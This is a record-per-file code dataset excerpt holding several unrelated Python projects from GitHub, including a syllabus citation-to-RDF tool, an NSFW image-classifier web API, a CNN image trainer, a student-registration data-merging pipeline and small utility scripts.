f.read()\n else:\n # Download HTML syllabus.\n resp = requests.get(url)\n if resp.ok:\n syllabusHtml = resp.text\n with open(cacheFilename, 'w') as f:\n f.write(syllabusHtml)\n return resp.text\n else:\n logging.error(f\"Couldn't download syllabus html. Response: {resp.status_code}\")\n return\n\n\ndef getDocSyllabus(url):\n # TODO\n logging.error(\"Docx syllabi not handled yet\")\n return\n\n\ndef downloadFile(url, destDir, courseID):\n \"\"\" Download a file from the interwebs, and\n save it to the destination directory.\n Returns file handle and content.\"\"\"\n # First, do we have this already?\n fn = url.split('/')[-1]\n ext = fn.split('.')[-1] # Maintain file extension\n if ext not in ['.pdf', '.htm', '.doc', '.docx']:\n ext = \".html\" # Handle bare URLs that are actually HTML\n outPath = f\"{destDir}/{courseID}.{ext}\"\n if exists(outPath):\n f = open(outPath)\n return f, f.read()\n else:\n resp = requests.get(url)\n if resp.ok:\n logging.info(f\"Writing file: {outPath}\")\n content = resp.content\n with open(outPath, 'wb') as f:\n f.write(content)\n return f, content\n else:\n logging.error(f\"Received error: {resp.status_code} when trying to get file {url}\")\n return None, None\n\ndef extractHTMLBib(html):\n \"\"\"\n Extract bibliographic data from HTML, using anystyle.\n First we'll need to convert to text.\n \"\"\"\n soup = BeautifulSoup(html, features='lxml')\n text = soup.getText()\n return extractPlainTextBib(text)\n\ndef extractPlainTextBib(text):\n \"\"\"\n Try to get citations from plain text, using anystyle.\n \"\"\"\n tempfile = \"/tmp/syllabus.txt\"\n with open(tempfile, 'w') as f:\n f.write(text)\n os.system('anystyle find ' + tempfile)\n return\n\ndef extractHTMLLinks(html):\n soup = BeautifulSoup(html, features='lxml')\n links = soup.find_all('a')\n logging.debug(f\"Found {len(links)} links\")\n return [link.get('href') for link in links]\n\n\ndef extractPlainTextLinks(text):\n extractor = URLExtract()\n urls = extractor.find_urls(text)\n return urls\n\n\ndef processURLs(urls):\n \"\"\" Given a list of URLs, found in a syllabus, and probably of an article or paper,\n let's process it with Zotero, and see if we can make a bibliographic entity out of it.\"\"\"\n allItemIDs = []\n if len(urls) > 0:\n for url in urls:\n logging.info(f\"Trying url: {url}\")\n rdf = url2rdf(url)\n if rdf is not None:\n itemId = writeRDF(rdf)\n allItemIDs.append(itemId)\n logging.info(formatIDs(allItemIDs))\n return allItemIDs\n\n\ndef writeRDF(rdf, courseID):\n \"\"\" Write out the RDF to readings/.rdf.xml. \"\"\"\n # Find the item ID for each one\n fn = f\"../data/texts/ttl/{courseID}.ttl\"\n # Check to make sure we don't already have it\n if type(rdf) != str:\n logging.error(\"Hmmm this doesn't look like a string. I'd better not write it.\")\n exit()\n if exists(fn):\n logging.info(f\"Looks like we already have {fn}\")\n return\n else:\n textGraph = rdflib.Graph()\n textGraph.parse(data=rdf, format='xml')\n turtleized = textGraph.serialize(format='turtle').decode('utf-8')\n with open(fn, 'w') as f:\n f.write(turtleized)\n logging.info(f\"Wrote {fn}\")\n\ndef formatIDs(itemList):\n \"\"\"\n We have lots of zotero ids, and we want to turn these into links in RDF.\n \"\"\"\n return f\"\"\"\n ccso:hasLM {\" , \".join(itemList)} ;\n \"\"\"\n\n\ndef getISBN(query):\n \"\"\" Query the Google Books API to get an ISBN for a book. \"\"\"\n params = {\"q\": query}\n resp = requests.get('https://www.googleapis.com/books/v1/volumes', params=params)\n if resp.ok:\n data = json.loads(resp.text)\n firstItem = data.get('items')[0]\n isbns = [ident['identifier'] for ident in\n firstItem['volumeInfo']['industryIdentifiers']\n if ident['type']=='ISBN_13' or ident['type']=='ISBN_10']\n return max(isbns)\n else:\n logging.error(\"Something went wrong with this query.\")\n logging.error(resp)\n\n\n@cli.command()\n@click.argument('URL', nargs=1)\ndef url(url):\n \"\"\"Translate a URL to RDF,\n where the URL is a link to an article or book.\"\"\"\n rdf = url2rdf(url)\n jwriteRDF(rdf)\n click.echo(rdf)\n\n\n@cli.command()\n@click.argument('ident', nargs=1)\ndef identifier(ident):\n \"\"\"Translate a DOI, arXiv, or ISBN to RDF\"\"\"\n click.echo(ident2rdf(ident))\n\ndef processSyllabus(url, courseID):\n \"\"\" We have to put this in a separate function from syllabus(),\n for Click reasons.\"\"\"\n logging.info(f\"Processing syllabus: {url}\")\n if url.endswith('.pdf'):\n pdfText = getPDFSyllabus(url, courseID)\n if pdfText is not None:\n links = extractPlainTextLinks(pdf)\n else:\n return\n elif url.endswith('.docx'):\n docText = getDocSyllabus(url)\n links = extractPlainTextLinks(docText)\n else: # Catches .html but also bare urls\n html = getHTMLSyllabus(url, courseID)\n if html is not None:\n # First try to get data from anystyle\n bibtex = extractHTMLBib(html)\n click.echo(bibtex)\n # Then just extract the links\n links = extractHTMLLinks(html)\n if links is None:\n # Try it this way instead, if the first way didn't work\n links = extractPlainTextLinks(html)\n else:\n return\n if links is None:\n logging.error(f\"Couldn't find any links in syllabus with URL: {url}\")\n return\n textIDs = processURLs(links)\n return textIDs\n\n\n@cli.command()\n@click.argument('URL', nargs=1)\ndef syllabus(url):\n \"\"\"Download a syllabus from a URL, extract links from it,\n and create RDF from those links.\"\"\"\n processSyllabus(url, 0)\n\n@cli.command()\n@click.argument('query', nargs=1)\ndef book(query):\n \"\"\" Try to get RDF for a book, by title or similar query.\n Uses the Google Books API.\n \"\"\"\n isbn = getISBN(query)\n logging.info('ISBN: ', isbn)\n rdf = ident2rdf(isbn)\n click.echo(rdf)\n click.echo(writeRDF(rdf))\n\ndef courseIDFromFilename(fn):\n \"\"\" We have been storing course ID numbers in the filename,\n e.g. 106.bib, 106.texts.txt, etc.\n Now we just want to get that ID back from the filename.\n \"\"\"\n onlyFileName = fn.split('/')[-1] # In case it has a path\n basename = onlyFileName.split('.')[0]\n try:\n courseID = int(basename)\n logging.info(f\"Assuming course name is {courseID}.\")\n except:\n logging.info(f\"Can't derive integer from {basename}. Filename must start with an integer, so that we can keep track of course IDs.\")\n exit()\n return courseID\n\n@cli.command()\n@click.argument('bibtexfile', nargs=1)\ndef bibtex(bibtexfile):\n \"\"\" Convert Bibtex files like 10.texts.txt.bib, where 10 is the course ID, to RDF.\"\"\"\n if not (bibtexfile.endswith('.bib') or bibtexfile.endswith('.bibtex')):\n logging.error(f\"File extension of {bibtexfile} not supported. Must be .bib or .bibtex.\")\n exit()\n courseID = courseIDFromFilename(bibtexfile)\n with open(bibtexfile, 'r', encoding='utf-8') as fn:\n bib = fn.read()\n rdf = translateBibtex(bib)\n click.echo(rdf)\n click.echo(writeRDF(rdf, courseID))\n\n@cli.command()\n@click.argument('referencesfile', nargs=1)\ndef references(referencesfile):\n \"\"\" Convert a plain text file containing references / citations (Chicago, MLA, etc) to RDF.\n Expects file to be named 10.texts.txt. Uses Anystyle, so, the executable for anystyle must be available in the PATH\"\"\"\n if not referencesfile.endswith('.txt'):\n logging.error(f\"File extension of {referencesfile} not supported. Must be .txt.\")\n exit()\n courseID = courseIDFromFilename(referencesfile)\n cmd = [\"anystyle\", \"-f\", \"bib\", \"--stdout\", \"parse\", referencesfile]\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n bibtex = stdout.decode('utf-8')\n logging.info(f\"Here's what anystyle found: {bibtex}\")\n rdf = translateBibtex(bibtex)\n click.echo(rdf)\n click.echo(writeRDF(rdf, courseID))\n\n\nif __name__== \"__main__\":\n cli()\n # lookupORCID(\"johnson\")\n","repo_name":"JonathanReeve/data-ethics-literature-review","sub_path":"turtleize/toRDF.py","file_name":"toRDF.py","file_ext":"py","file_size_in_byte":13214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38086296516","text":"import asyncio\n\nimport aiohttp\nimport async_timeout\nimport numpy as np\nimport uvloop\nfrom aiohttp import web\nfrom aiohttp.web import FileField\nfrom aiohttp.web import HTTPBadRequest\nfrom aiohttp.web import HTTPNotFound\nfrom aiohttp.web import HTTPUnsupportedMediaType\n\nfrom classify_nsfw import caffe_preprocess_and_compute, load_model\n\n\nnsfw_net, caffe_transformer = load_model()\n\n\ndef classify(image: bytes) -> np.float64:\n scores = caffe_preprocess_and_compute(image,\n caffe_transformer=caffe_transformer,\n caffe_net=nsfw_net,\n output_layers=[\"prob\"])\n return scores[1]\n\n\nasync def fetch(session, url):\n with async_timeout.timeout(10):\n async with session.get(url) as response:\n if response.status == 404:\n raise HTTPNotFound()\n return await response.read()\n\n\nclass API(web.View):\n async def post(self):\n request = self.request\n data = await request.post()\n try:\n if data.get('url'):\n image = await fetch(session, data[\"url\"])\n elif data.get('file'):\n image = data.get('file')\n if type(image) == FileField:\n image = image.file.read()\n else:\n raise OSError(\"File is not a valid multipart file upload.\")\n else:\n raise KeyError()\n nsfw_prob = classify(image)\n text = nsfw_prob.astype(str)\n return web.Response(text=text)\n except KeyError:\n error_text = \"Missing `url` or `file` POST parameter\"\n return HTTPBadRequest(text=error_text)\n except OSError as e:\n if \"cannot identify\" in str(e):\n raise HTTPUnsupportedMediaType(text=\"Invalid image\")\n else:\n raise e\n except ValueError:\n raise HTTPBadRequest(text=\"Malformed image provided\")\n\n\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\nsession = aiohttp.ClientSession()\napp = web.Application()\napp.router.add_route(\"*\", \"/\", API)\nweb.run_app(app)\n","repo_name":"rahiel/open_nsfw--","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"54"} +{"seq_id":"26608262886","text":"#Importing Necessary Libraries\nfrom PIL import Image\nimport numpy as np\nimport os\nimport cv2\nimport keras\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D,MaxPooling2D,Dense,Flatten,Dropout\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/\"))\n\ndata=[]\nlabels=[]\ndata_a=os.listdir(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/images/ImageDataset/\")\nfor a in data_a:\n try:\n image=cv2.imread(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/images/ImageDataset/\"+a)\n image_from_array = Image.fromarray(image, 'RGB')\n size_image = image_from_array.resize((50, 50))\n data.append(np.array(size_image))\n labels.append(0)\n except AttributeError:\n print(\"\")\n\ntest=os.listdir(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/images/ImageTestset/\")\nfor b in test:\n try:\n image=cv2.imread(\"C:/Users/nEW u/MACHINE LEARNING/project/paddygrass-distinguisher/images/images/ImageTestset/\"+b)\n image_from_array = Image.fromarray(image, 'RGB')\n size_image = image_from_array.resize((50, 50))\n data.append(np.array(size_image))\n labels.append(1)\n except AttributeError:\n print(\"\")\n \nCells=np.array(data)\nlabels=np.array(labels)\n\n#Saving and Loading the data we prepared so next time we can load it from saved .npy file.\n\nnp.save(\"Cells\",Cells)\nnp.save(\"labels\",labels)\n\nCells=np.load(\"Cells.npy\")\nlabels=np.load(\"labels.npy\")\n\n#Do Train/Test Split of data and labels that prepared in early section. \n#Classes are defined as the unique labels in the data. Here it will be \n#2 as Parasitized:0 and Uninfected:1, here 0 and 1 are the mapping in \n#labels for these two classes\n\ns=np.arange(Cells.shape[0])\nnp.random.shuffle(s)\nCells=Cells[s]\nlabels=labels[s]\n\nnum_classes=len(np.unique(labels))\nlen_data=len(Cells)\n\n(x_train,x_test)=Cells[(int)(0.1*len_data):],Cells[:(int)(0.1*len_data)]\nx_train = x_train.astype('float32')/255 # As we are working on image data we are normalizing data by divinding 255.\nx_test = x_test.astype('float32')/255\ntrain_len=len(x_train)\ntest_len=len(x_test)\n\n(y_train,y_test)=labels[(int)(0.1*len_data):],labels[:(int)(0.1*len_data)]\n\n#Doing One hot encoding as classifier has multiple classes\ny_train=keras.utils.to_categorical(y_train,num_classes)\ny_test=keras.utils.to_categorical(y_test,num_classes)\n\n#creating sequential model\nmodel=Sequential()\nmodel.add(Conv2D(filters=16,kernel_size=2,padding=\"same\",activation=\"relu\",input_shape=(50,50,3)))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Conv2D(filters=32,kernel_size=2,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Conv2D(filters=64,kernel_size=2,padding=\"same\",activation=\"relu\"))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(500,activation=\"relu\"))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(2,activation=\"softmax\"))#2 represent output layer neurons \nmodel.summary()\n\n# compile the model with loss as categorical_crossentropy and using adam optimizer you can test result by trying RMSProp as well as Momentum\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n#Fit the model with min batch size as 50[can tune batch size to some factor of 2^power ] \nmodel.fit(x_train,y_train,batch_size=50,epochs=20,verbose=1)\n\n#Check the accuracy on Test data:\naccuracy = model.evaluate(x_test, y_test, verbose=1)\nprint('\\n', 'Test_Accuracy:-', accuracy[1])\n\n#Save the model weights:\n \nfrom keras.models import load_model\nmodel.save('save.h5')\n\n\n\n","repo_name":"avinash1605/Paddy-Grass-Distinguisher","sub_path":"code file.py","file_name":"code file.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34466059416","text":"import time\nimport os\nimport pandas as pd\nimport numpy as np\nfrom Handlers.directories import path_to_final_data_S20\nfrom Handlers.major_advisor_data import ug_final_df, gr_final_df\nfrom Handlers.file_imports import NEW_students_FINAL, \\\n NEW_students, new_stud_issm_data, sevis_inital_student_data, \\\nissm_reg_data_success, NEW_final_MASTER, issm_add_address_phone\n\n\noutname = 'data_diff.csv'\n\noutdir = path_to_final_data_S20\nif not os.path.exists(outdir):\n os.mkdir(outdir)\n\nfullname = os.path.join(outdir, outname)\n\n\ndef dataframe_difference(which=None):\n \"\"\"Find rows which are different between two DataFrames.\"\"\"\n df1 = pd.read_csv(new_stud_issm_data)\n df2 = pd.read_csv(sevis_inital_student_data)\n\n # filter the data by a date range. Need to set csv file ['Program Start Date'}\n # to Short Date\n filtered = df2[(df2['Program Start Date'] > '1/1/2020')\n & (df2['Program Start Date'] < '2/1/2020')]\n # compare the data via an outer join to capture all rows from both data sets\n comparison_df = df1.merge(filtered, indicator=True, how='outer')\n\n if which is None:\n diff_df = comparison_df[comparison_df['_merge'] != 'both']\n else:\n diff_df = comparison_df[comparison_df['_merge'] == which]\n diff_df.to_csv(fullname)\n return diff_df\n\n\ndef merge_new_data():\n \"\"\"\n Merges data via pandas merge function and then exports the updated\n Dataframe to an Excel spreadsheet. The function also removes\n duplicates.\n \"\"\"\n issm_sev_pending = pd.read_csv(new_stud_issm_data)\n sev_pending = pd.read_csv(sevis_inital_student_data)\n\n # filter the data by a date range\n filtered = sev_pending[(sev_pending['Program Start Date'] > '1/1/2020')\n & (sev_pending['Program Start Date'] < '2/1/2020')]\n\n results = pd.merge(filtered, issm_sev_pending[\n ['Campus Id', 'SEVIS ID','Profile Status','Level of Education (display)',\n 'Major Field (display)', '03 Student Status Term',\n '07 Total Credit Hours', '04 Transfer From', '06 Transfer In Date',\n '20 ISO Attendance Date', '14 CHECK IN I94 or Entry Stamp',\n '05 Banner Student Status', 'E-mail Address',\n 'Phone 1', '26 University advisor','DataLink Active']],\n on='SEVIS ID', how='left')\n # indicator=True)\n cleaned_results = \\\n results.drop_duplicates(subset=['SEVIS ID'], keep='last').copy()\n cleaned_results = cleaned_results[[\n 'E-mail Address', 'Campus Id', 'SEVIS ID', 'Surname/Primary Name',\n 'Given Name', 'Class of Admission', 'Profile Status',\n 'Level of Education (display)', 'Program Start Date',\n 'Major Field (display)', '04 Transfer From', '06 Transfer In Date',\n '03 Student Status Term', '07 Total Credit Hours',\n '20 ISO Attendance Date', '14 CHECK IN I94 or Entry Stamp',\n '05 Banner Student Status', 'Eligible for Registration',\n 'DataLink Active', 'E-mail Address', 'Phone 1', '26 University advisor']]\n # can be a list, a Series, an array or a scalar\n # cleaned_results.insert(loc=0, column='Registration Status', value='')\n cleaned_results.insert(loc=0, column='Registration Notes', value='')\n\n return cleaned_results\n\n\ndef match_new_advisor(cleaned_results, ug_final_df, gr_final_df):\n \"\"\"\n match_advisor checks the majors in a column of workbook(ws) and\n then matches them with the advisor in a dictionary from the module:\n major_advisor_data\n \"\"\"\n cleaned_results = cleaned_results\n\n ug_final_df.columns = ['Major Field (display)', 'Advisor', 'Level of Education (display)']\n gr_final_df.columns = ['Major Field (display)', 'Advisor', 'Level of Education (display)']\n\n ug_results = pd.merge(cleaned_results, ug_final_df[\n ['Advisor',\n 'Level of Education (display)',\n 'Major Field (display)']],\n on=['Level of Education (display)', 'Major Field (display)'],\n how='left')\n\n gr_results = pd.merge(ug_results, gr_final_df[\n ['Advisor',\n 'Level of Education (display)',\n 'Major Field (display)']],\n on=['Level of Education (display)', 'Major Field (display)'],\n how='left')\n\n # combine the two advisor DataFrame columns\n gr_results['Advisor'] = \\\n gr_results.pop(\"Advisor_x\").fillna(gr_results.pop(\"Advisor_y\")).astype(str)\n\n writer = pd.ExcelWriter(NEW_students_FINAL)\n gr_results.to_excel(writer, 'Sheet1', index=False)\n writer.save()\n\n\ndef add_advisor_notes():\n \"\"\"\n add_advisor_notes fills any null values in Total Credit Hours(TCH),\n CHECK IN I94(CI94) with zeros and Not Complete, respectively, and then\n inserts a Registration Notes column and populates it with a formatted\n string of values from TCH and CI94\n \"\"\"\n final_workbook = pd.read_excel(NEW_students_FINAL)\n\n # remove NaN values and replace with readable notes for users\n units = final_workbook['07 Total Credit Hours'].fillna(0)\n check_in = final_workbook['14 CHECK IN I94 or Entry Stamp']. \\\n fillna('Not Complete')\n\n # convert the two Series to numpy char arrays\n a = np.char.array(check_in.values)\n b = np.char.array(units.values)\n\n # concatenate the two numpy char arrays, b' represents\n # a Boolean check (bytes) for the astype (str) function\n final = final_workbook['Registration Notes'] = \\\n (b'SV Status: ' + a + b', Registered Units: ' + b).astype(str)\n # convert the concatenated char array to a DataFrame.\n df_final = pd.DataFrame(final, columns=['Registration Notes'])\n\n # drop registration column on final workbook\n final_workbook.drop(['Registration Notes'], axis=1, inplace=True)\n # combine the two DataFrames. axis=1 concatenates horizontally\n # rather than vertically\n df_combine = pd.concat([df_final, final_workbook], axis=1)\n\n with pd.ExcelWriter(NEW_students_FINAL, mode='w') as writer:\n df_combine.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n\n\ndef sort_new_data():\n \"\"\"\n Function to sort the Dataframe and then spreadsheet by I-94 check-in\n entry and then by campusID\n \"\"\"\n active_data = pd.read_excel(NEW_students_FINAL, sheet_name=0)\n sorted_by_CWID = active_data.sort_values(['14 CHECK IN I94 or Entry Stamp'], ascending=True)\n\n writer = pd.ExcelWriter(NEW_students_FINAL, engine='openpyxl')\n writer.book = NEW_students\n writer.sheets = dict((ws.title, ws) for ws in NEW_students.worksheets)\n\n sorted_by_CWID.to_excel(writer, 'Sheet', index=False)\n writer.save()\n\n\ndef print_new_work_done():\n work_output = [\"-Built discrepancy report\",\n \"-New Excel workbook built\",\n \"-Read ISSM Report\",\n \"-Read SEVIS Report\",\n \"-Data between reports matched on SEVIS ID\",\n \"-Matched Advisors based on Major data\",\n \"-New Data saved to NEW_Final workbook\",\n \"-Sorted by CWID\"]\n for work in work_output:\n time.sleep(0.3)\n print(work)\n\n\ndef update_checkin_status():\n \"\"\"\n update_checkin_status, will reference a newer workbook with the\n existing final_workbook and update fields defined in the function\n with the most up to date value.\n \"\"\"\n active_pending_issm = pd.read_excel(issm_add_address_phone)\n final_workbook = pd.read_excel(NEW_final_MASTER)\n\n # drop columns to merge new data from active_pending_issm worksheet properly\n try:\n final_workbook.drop(['03 Student Status Term',\n '07 Total Credit Hours',\n '14 CHECK IN I94 or Entry Stamp'], axis=1,\n inplace=True)\n # Save workbook to apply changes\n with pd.ExcelWriter(NEW_final_MASTER, mode='w') as writer:\n final_workbook.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n except:\n print(\"Columns don't exist. No drop performed.\")\n\n finally:\n results = pd.merge(final_workbook, active_pending_issm[\n ['Campus Id', '03 Student Status Term',\n '07 Total Credit Hours', '14 CHECK IN I94 or Entry Stamp',\n 'Address Type', 'Address Line 1', 'Address Line 2',\n 'City', 'Phone 1']], how='left', on='Campus Id')\n\n cleaned_results = \\\n results.drop_duplicates(subset=['SEVIS ID'], keep='first')\n\n # rename_cols = cleaned_results.rename(columns=\n # {'03 Student Status Term_x':'03 Student Status Term',\n # '07 Total Credit Hours_x':'07 Total Credit Hours',\n # '14 CHECK IN I94 or Entry Stamp_x':'14 CHECK IN I94 or Entry Stamp'})\n\n try:\n final_layout = cleaned_results[[\n 'Registration Notes', 'Event Name', 'Event Status',\n 'Advisor', 'E-mail Address', 'Campus Id', 'SEVIS ID',\n 'Surname/Primary Name', 'Given Name', 'Class of Admission',\n 'Level of Education (display)', 'Major Field (display)',\n '03 Student Status Term', '07 Total Credit Hours',\n '14 CHECK IN I94 or Entry Stamp', '05 Banner Student Status',\n 'Eligible for Registration', 'DataLink Active',\n 'Address Type', 'Address Line 1', 'Address Line 2',\n 'City', 'Phone 1']]\n except:\n final_layout = cleaned_results[[\n 'Registration Notes', 'Advisor', 'E-mail Address', 'Campus Id',\n 'SEVIS ID', 'Surname/Primary Name', 'Given Name', 'Class of Admission',\n 'Level of Education (display)', 'Major Field (display)',\n '03 Student Status Term', '07 Total Credit Hours',\n '14 CHECK IN I94 or Entry Stamp','05 Banner Student Status',\n 'Eligible for Registration', 'DataLink Active',\n 'Address Type', 'Address Line 1', 'Address Line 2',\n 'City','Phone 1']]\n\n with pd.ExcelWriter(NEW_final_MASTER, mode='w') as writer:\n final_layout.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n\n\ndef match_registration_event():\n \"\"\"\n match registration event will add two columns from an ISSM report that\n contains SEVIS Registration event information and join it on the new\n NEW_Students_FINAL workbook\n \"\"\"\n final_workbook = pd.read_excel(NEW_final_MASTER)\n issm_reg = pd.read_excel(issm_reg_data_success)\n\n try:\n final_workbook.drop(['Event Name', 'Event Status'], axis=1,\n inplace=True)\n # Save workbook to apply changes\n with pd.ExcelWriter(NEW_final_MASTER, mode='w') as writer:\n final_workbook.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n\n except:\n print(\"Columns don't exist. No drop performed.\")\n\n finally:\n # perform merge with new data from active_pending_issm\n results = pd.merge(final_workbook, issm_reg[\n ['SEVIS ID', 'Event Name', 'Event Status']],\n on='SEVIS ID', how='left')\n # indicator=True)\n cleaned_results = \\\n results.drop_duplicates(subset=['SEVIS ID'], keep='first')\n\n final_layout = cleaned_results[[\n 'Registration Notes', 'Event Name', 'Event Status',\n 'E-mail Address', 'Campus Id', 'SEVIS ID',\n 'Surname/Primary Name', 'Given Name',\n 'Class of Admission', 'Level of Education (display)',\n 'Major Field (display)', '03 Student Status Term',\n '07 Total Credit Hours', '14 CHECK IN I94 or Entry Stamp',\n '05 Banner Student Status', 'Eligible for Registration',\n 'DataLink Active', 'Advisor']]\n\n with pd.ExcelWriter(NEW_final_MASTER, mode='w') as writer:\n final_layout.to_excel(writer, 'Sheet1', index=False,\n engine='openpyxl')\n writer.save()\n\n\nif __name__ == '__main__':\n start_time = time.time()\n dataframe_difference(which=None)\n match_new_advisor(merge_new_data(), ug_final_df, gr_final_df)\n add_advisor_notes()\n sort_new_data()\n print_new_work_done()\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"nmbenzo/SEVIS_student_data","sub_path":"New_Student_Registration/populate_new_student_notes.py","file_name":"populate_new_student_notes.py","file_ext":"py","file_size_in_byte":12275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22497977796","text":"\nimport os\nimport time\nimport sys\n\n\n\ndef Display(msg,t,var):\n for x in msg:\n if (var == 1):\n print('\\033[1m' + x, end=' ')\n elif (var == 0):\n print('\\033[1m' + x, end='')\n sys.stdout.flush()\n time.sleep(t)\n\n\n\ndef Clear():\n os.system( 'cls' )\n\nans=True\nwhile (ans==True):\n Clear()\n Display(\"\\n\\n ************ Face detection System Genered By ABDALLAOUI MAAN Amine *********** \\n\\n\",0.02,0)\n print('--> Please choose the option that you would executed : \\n')\n print (\"\"\"\n 1.Add a Student\n 2.Edit DataFrame cell\n 3.Delete a Student\n 4.Create a dataSet\n 5.Training DataSet\n 6.Detector\n 7.DataFrame consulting\n 8.New day (Make all Absent)\n 9.Exit/Quit\n \"\"\")\n choice=input(\" [+] What would you like to do? \" )\n if choice==\"1\":\n os.system('python ADD_STUDENT.py')\n print(\"\\nStudent Added\")\n \n \n elif choice==\"2\":\n os.system('python CHANGE_CELL.py')\n print(\"\\n Cell edited\")\n \n elif choice==\"3\":\n os.system('python DELETE_STUDENT.py')\n print(\"\\n Student Deleted\")\n \n elif choice==\"4\":\n os.system('python datasetCreator.py')\n print(\"\\n DataSet Created\")\n \n elif choice==\"5\":\n os.system('python Trainner.py') \n print(\"\\n Trainning finished\")\n \n elif choice==\"6\":\n os.system('python detector.py')\n\n elif choice==\"7\":\n os.system('python DATA_CONSULTING.py')\n print('\\n')\n\n \n elif choice==\"8\":\n os.system('python NEW_DAY.py')\n \n elif choice==\"9\":\n print(\"\\n Goodbye\")\n print(\" -->Thanks for using our face recognition system ...!\")\n Display('\\n ***** MASTER INFORMATIQUE ET TELECOMMUNICATION *****\\n\\n',0.1,1)\n break\n \n elif choice !=\"\":\n print(\"\\n Not Valid Choice Try again\") \n \n","repo_name":"Abdallaoui-maan-Amine/Class_Presence_Handling_using_FaceRecognition","sub_path":"Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37966150228","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\ndb_name=''\n\npushover_app_token=''\nsia_base = 'https://www.sia.aviation-civile.gouv.fr/aip/enligne/Atlas-VAC/FR/'\nsia_link_page = 'VACProduitPartie.htm'\nsia_link_needle = 'Liste de contr'\n\npdf_dst = 'ctrl.pdf'\npdf_regex = \"^(?P(?:AD 2 (?PLF[A-Z]{2})|AD-2\\.VAC\\.(?PLF[A-Z]{2})).*) (?P[0-9]{2} (?:JAN|FEB|MAR|APR|MAY|JUN|JUL|AUG|SEP|OCT|NOV|DEC) [0-9]{4})$\"\npdf_pages = (15, 30)\npdf_ad = (300, 600)\npdf_records = (1000, 2000)\n","repo_name":"mwetterw/Mellovvac","sub_path":"src/config.sample.py","file_name":"config.sample.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18696017877","text":"from utils import pyengine\nimport glfw\n\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 1000\n\nwindow = pyengine.create_window(SCREEN_WIDTH, SCREEN_HEIGHT)\n\n# engine initialization\nscene = pyengine.PyEngine(SCREEN_WIDTH, SCREEN_HEIGHT)\nscene.init(GUI=False)\n\nscene.State = pyengine.State.GAME_ACTIVE\n\n# set light\nlight = False\n\n# set game object's attributes\norientation = [1.0, 0.0, 0.0,\n 0.0, 1.0, 0.0,\n 0.0, 0.0, 1.0]\nposition = [0.0, 0.0, 0.0]\nsize = [3.0, 0.0, 3.0]\n\n# create ground object\nground = scene.create_object(\"ground\", orientation, position, size)\n\n# create boxes\nboxes = []\nfor i in range(5):\n for j in range(5):\n for k in range(5):\n size = 0.05\n basePosition = [\n i * 5 * size + (k * size), j * 10 * size, k * 5 * size + 5\n ]\n size = [0.05, 0.05, 0.05]\n box = scene.create_object(\"box\", orientation, basePosition, size)\n scene.add_box_to_engine(box)\n boxes.append(box)\n\nscene.set_simulation_speed(1)\n\ntimer = glfw.get_time()\nframes = updates = 0\n\nwhile 1:\n now_time = glfw.get_time()\n scene.update_from_physic_engine(boxes)\n\n for box in boxes:\n box.draw(light=False, GUI=False)\n\n frames += 1\n\n if glfw.get_time() - timer > 1.0:\n timer += 1\n print(\"FPS: \", frames)\n updates = frames = 0\n\npyengine.terminate()\n","repo_name":"mertlsarac/PyEngine","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21387395216","text":"\"\"\"--------------------ι𝐍Ⓙย𝐬𝓣ᶤςⒺ Ⓐ𝐍YωᕼⒺг𝐄 ᶤ𝐬 ᵃ thяᗴAт ⓉO 𝐣υ𝔰t𝐢ᶜⓔ 𝐄V乇яy山卄εŘ乇 --------------------\n\nDescription:\n Extracts information from a dictionary and prints information about a student.\n\nUsage:\n python lab2.py\n\n---------------------ι𝐍Ⓙย𝐬𝓣ᶤςⒺ Ⓐ𝐍YωᕼⒺг𝐄 ᶤ𝐬 ᵃ thяᗴAт ⓉO 𝐣υ𝔰t𝐢ᶜⓔ 𝐄V乇яy山卄εŘ乇--------------------\"\"\"\ndef main():\n about_me = {\n\n 'full_name': 'Geoff Smith',\n 'student_id': 10256979,\n 'pizzatoppings': ['OLIVES', 'SAUSAGE', 'ONIONS'],\n 'movies': [\n {\n 'title': 